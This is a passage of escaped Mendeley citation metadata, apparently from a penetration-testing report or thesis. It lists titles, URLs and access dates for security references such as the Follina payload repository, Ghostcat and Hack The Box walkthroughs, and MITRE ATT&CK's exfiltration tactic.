payload&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,7,30]]},&quot;URL&quot;:&quot;https://github.com/JohnHammond/msdt-follina#readme&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_935b28db-bc00-4f0c-97d8-95afc6a4abe3&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[15]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;95aecbf8-f06e-36b8-b53f-dae2469dcd9b&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;95aecbf8-f06e-36b8-b53f-dae2469dcd9b&quot;,&quot;title&quot;:&quot;Pre-engagement - The Penetration Testing Execution Standard&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,5,21]]},&quot;URL&quot;:&quot;http://www.pentest-standard.org/index.php/Pre-engagement&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_a92c7898-8e38-4a06-b77b-ad150b406ad3&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[55]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fYTkyYzc4OTgtOGUzOC00YTA2LWI3N2ItYWQxNTBiNDA2YWQz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28f6aa28-4ef0-4829-b097-8da468944ed5&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[55]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fMjhmNmFhMjgtNGVmMC00ODI5LWIwOTctOGRhNDY4OTQ0ZWQ1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c7729b29-6ad6-4dc7-9985-d046be1f9064&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[55]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fYzc3MjliMjktNmFkNi00ZGM3LTk5ODUtZDA0NmJlMWY5MDY0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1310dcde-3f61-4a73-bdca-b888c56681f9&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[55]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fMTMxMGRjZGUtM2Y2MS00YTczLWJkY2EtYjg4OGM1NjY4MWY5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d23a8961-71c2-40f8-9f15-323df41193e9&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[55]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fZDIzYTg5NjEtNzFjMi00MGY4LTlmMTUtMzIzZGY0MTE5M2U5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d7fa9820-3320-4c4a-b0cc-9b293192b5ca&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[55]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fZDdmYTk4MjAtMzMyMC00YzRhLWIwY2MtOWIyOTMxOTJiNWNh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22d2bc12-9eea-4e51-8a7a-8fbd560a458f&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[55]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fMjJkMmJjMTItOWVlYS00ZTUxLThhN2EtOGZiZDU2MGE0NThm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5c2fb73b-2f83-4755-9829-d80e67e60347&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[55]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fNWMyZmI3M2ItMmY4My00NzU1LTk4MjktZDgwZTY3ZTYwMzQ3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042a10d9-1417-4892-8f22-31e2521d8211&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[55]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fMDQyYTEwZDktMTQxNy00ODkyLThmMjItMzFlMjUyMWQ4MjEx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3d57024e-9740-47c0-b129-7858ce03dada&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[55]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fM2Q1NzAyNGUtOTc0MC00N2MwLWIxMjktNzg1OGNlMDNkYWRh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e39b5b3c-63cc-4590-bb26-cd1771ab0b0c&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[55]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fZTM5YjViM2MtNjNjYy00NTkwLWJiMjYtY2QxNzcxYWIwYjBj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145147b9-520c-4684-bfde-c822ac062cb0&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[55]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fMTQ1MTQ3YjktNTIwYy00Njg0LWJmZGUtYzgyMmFjMDYyY2Iw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4d6ac433-8c72-4eae-9027-bc2383035003&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[55]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fNGQ2YWM0MzMtOGM3Mi00ZWFlLTkwMjctYmMyMzgzMDM1MDAz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68e0b5b7-6e83-4ff8-bfaa-953352163ea1&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[55]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fNjhlMGI1YjctNmU4My00ZmY4LWJmYWEtOTUzMzUyMTYzZWEx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bf1b1e40-a82b-4267-b6c2-8a63c6f02fb4&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[55]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fYmYxYjFlNDAtYTgyYi00MjY3LWI2YzItOGE2M2M2ZjAyZmI0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4bb23479-c5f7-495e-9730-13331a49b027&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[55]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fNGJiMjM0NzktYzVmNy00OTVlLTk3MzAtMTMzMzFhNDliMDI3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b7f703ae-f6eb-4322-9ccf-d1f6e2d07319&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[55]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fYjdmNzAzYWUtZjZlYi00MzIyLTljY2YtZDFmNmUyZDA3MzE5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cd2a2409-76c6-4457-8dba-f18bcaa69ba8&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[55]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fY2QyYTI0MDktNzZjNi00NDU3LThkYmEtZjE4YmNhYTY5YmE4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adffed05-a463-4741-ab14-e7cae4687a5a&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[55]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fYWRmZmVkMDUtYTQ2My00NzQxLWFiMTQtZTdjYWU0Njg3YTVh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a8d4f3b0-2592-41dc-b74b-4102ab1e113f&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[55]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fYThkNGYzYjAtMjU5Mi00MWRjLWI3NGItNDEwMmFiMWUxMTNm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b64cc035-b6f8-4f4a-98b9-d8ddbf09ab84&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[55]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fYjY0Y2MwMzUtYjZmOC00ZjRhLTk4YjktZDhkZGJmMDlhYjg0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40635d1b-114a-4b1c-9bd6-d6895acd7842&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[55]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fNDA2MzVkMWItMTE0YS00YjFjLTliZDYtZDY4OTVhY2Q3ODQy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7a98870c-b90c-4956-9f69-1aa98781d821&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[55]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fN2E5ODg3MGMtYjkwYy00OTU2LTlmNjktMWFhOTg3ODFkODIx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516a5720-df27-4802-9451-b528d4244634&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[55]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fNTE2YTU3MjAtZGYyNy00ODAyLTk0NTEtYjUyOGQ0MjQ0NjM0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e1a9ffe7-090f-49dd-9d5e-49fe9cae18c4&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[55]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fZTFhOWZmZTctMDkwZi00OWRkLTlkNWUtNDlmZTljYWUxOGM0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c5205239-2705-4106-8f6b-eb7170468e94&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[55]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;0a2e989d-d6b2-3f53-96ff-722c406b7cf7&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;0a2e989d-d6b2-3f53-96ff-722c406b7cf7&quot;,&quot;title&quot;:&quot;TryHackMe! Ghostcat CVE-2020-1938 - YouTube&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,26]]},&quot;URL&quot;:&quot;https://www.youtube.com/watch?v=-Cy4u6fA3Os&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_d1441eaf-e264-4af3-9ed5-8ed6a02830ff&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[56]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;496c799f-b798-3080-8cab-3ddede7a2042&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;496c799f-b798-3080-8cab-3ddede7a2042&quot;,&quot;title&quot;:&quot;Hack The Box: Jerry Walkthrough [Apache Tomcat, Default Credentials, Payload Creation] - YouTube&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,28]]},&quot;URL&quot;:&quot;https://www.youtube.com/watch?v=ipiKmdW7pJo&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_2c977c80-4318-4212-8595-d9c8811e6acd&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[57]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;0a03e190-6c40-3023-8d5d-da7f2de2116d&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;0a03e190-6c40-3023-8d5d-da7f2de2116d&quot;,&quot;title&quot;:&quot;Hack the box (HTB) machines walkthrough series – Jerry - Infosec Resources&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,28]]},&quot;URL&quot;:&quot;https://resources.infosecinstitute.com/topic/hack-the-box-htb-machines-walkthrough-series-jerry/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_cffc7946-04df-4b12-adaa-883ec381b038&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[57]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;0a03e190-6c40-3023-8d5d-da7f2de2116d&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;0a03e190-6c40-3023-8d5d-da7f2de2116d&quot;,&quot;title&quot;:&quot;Hack the box (HTB) machines walkthrough series – Jerry - Infosec Resources&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,28]]},&quot;URL&quot;:&quot;https://resources.infosecinstitute.com/topic/hack-the-box-htb-machines-walkthrough-series-jerry/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_45c5b557-7b37-4e27-a3c8-a35bb4e252ca&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[57]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;0a03e190-6c40-3023-8d5d-da7f2de2116d&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;0a03e190-6c40-3023-8d5d-da7f2de2116d&quot;,&quot;title&quot;:&quot;Hack the box (HTB) machines walkthrough series – Jerry - Infosec Resources&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,28]]},&quot;URL&quot;:&quot;https://resources.infosecinstitute.com/topic/hack-the-box-htb-machines-walkthrough-series-jerry/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_e1a8ef1e-15f5-4b8b-bec5-36f44bef3c19&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[57]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;0a03e190-6c40-3023-8d5d-da7f2de2116d&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;0a03e190-6c40-3023-8d5d-da7f2de2116d&quot;,&quot;title&quot;:&quot;Hack the box (HTB) machines walkthrough series – Jerry - Infosec Resources&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,28]]},&quot;URL&quot;:&quot;https://resources.infosecinstitute.com/topic/hack-the-box-htb-machines-walkthrough-series-jerry/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_b584a7d8-a313-476e-a5e1-1cfaf733466e&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[57]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;0a03e190-6c40-3023-8d5d-da7f2de2116d&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;0a03e190-6c40-3023-8d5d-da7f2de2116d&quot;,&quot;title&quot;:&quot;Hack the box (HTB) machines walkthrough series – Jerry - Infosec Resources&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,28]]},&quot;URL&quot;:&quot;https://resources.infosecinstitute.com/topic/hack-the-box-htb-machines-walkthrough-series-jerry/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_ed018098-2121-4221-bba1-b5866c4dca20&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[57]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;0a03e190-6c40-3023-8d5d-da7f2de2116d&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;0a03e190-6c40-3023-8d5d-da7f2de2116d&quot;,&quot;title&quot;:&quot;Hack the box (HTB) machines walkthrough series – Jerry - Infosec Resources&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,28]]},&quot;URL&quot;:&quot;https://resources.infosecinstitute.com/topic/hack-the-box-htb-machines-walkthrough-series-jerry/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_acfc44b5-8145-40c9-bc2f-3ac9b3390fb6&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[57]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;0a03e190-6c40-3023-8d5d-da7f2de2116d&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;0a03e190-6c40-3023-8d5d-da7f2de2116d&quot;,&quot;title&quot;:&quot;Hack the box (HTB) machines walkthrough series – Jerry - Infosec Resources&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,28]]},&quot;URL&quot;:&quot;https://resources.infosecinstitute.com/topic/hack-the-box-htb-machines-walkthrough-series-jerry/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_d8a7a950-5d82-4f1d-9915-d107a137be7c&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[57]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;0a03e190-6c40-3023-8d5d-da7f2de2116d&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;0a03e190-6c40-3023-8d5d-da7f2de2116d&quot;,&quot;title&quot;:&quot;Hack the box (HTB) machines walkthrough series – Jerry - Infosec Resources&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,28]]},&quot;URL&quot;:&quot;https://resources.infosecinstitute.com/topic/hack-the-box-htb-machines-walkthrough-series-jerry/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_af9e35ad-64ed-4082-92ef-a1ecec8c391b&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[57]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;0a03e190-6c40-3023-8d5d-da7f2de2116d&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;0a03e190-6c40-3023-8d5d-da7f2de2116d&quot;,&quot;title&quot;:&quot;Hack the box (HTB) machines walkthrough series – Jerry - Infosec Resources&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,6,28]]},&quot;URL&quot;:&quot;https://resources.infosecinstitute.com/topic/hack-the-box-htb-machines-walkthrough-series-jerry/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_1865af65-923d-41ac-a844-67c37ebd9a8e&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[58]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;97e88510-a3e9-338b-b39d-553e8d8cc9f3&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;97e88510-a3e9-338b-b39d-553e8d8cc9f3&quot;,&quot;title&quot;:&quot;Exfiltration, Tactic TA0010 - Enterprise | MITRE ATT&amp;CK®&quot;,&quot;accessed&quot;:{&quot;date-parts&quot;:[[2022,8,9]]},&quot;URL&quot;:&quot;https://attack.mitre.org/tactics/TA0010/&quot;,&quot;container-title-short&quot;:&quot;&quot;},&quot;isTemporary&quot;:false}]},{&quot;citationID&quot;:&quot;MENDELEY_CITATION_e4cf5234-4242-46e6-adbb-7dea788712e4&quot;,&quot;properties&quot;:{&quot;noteIndex&quot;:0},&quot;isEdited&quot;:false,&quot;manualOverride&quot;:{&quot;isManuallyOverridden&quot;:false,&quot;citeprocText&quot;:&quot;[59]&quot;,&quot;manualOverrideText&quot;:&quot;&quot;},&quot;citationTag&quot;:&quot;MENDELEY_CITATION_v3_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&quot;,&quot;citationItems&quot;:[{&quot;id&quot;:&quot;61d1f07e-bfc7-30f3-ad2c-c38be7b0776e&quot;,&quot;itemData&quot;:{&quot;type&quot;:&quot;webpage&quot;,&quot;id&quot;:&quot;61d1f07e-bfc7-30f3-ad2c-c38be7b0776e&quot;,&quot;title&quot;:&quot;Covering Your 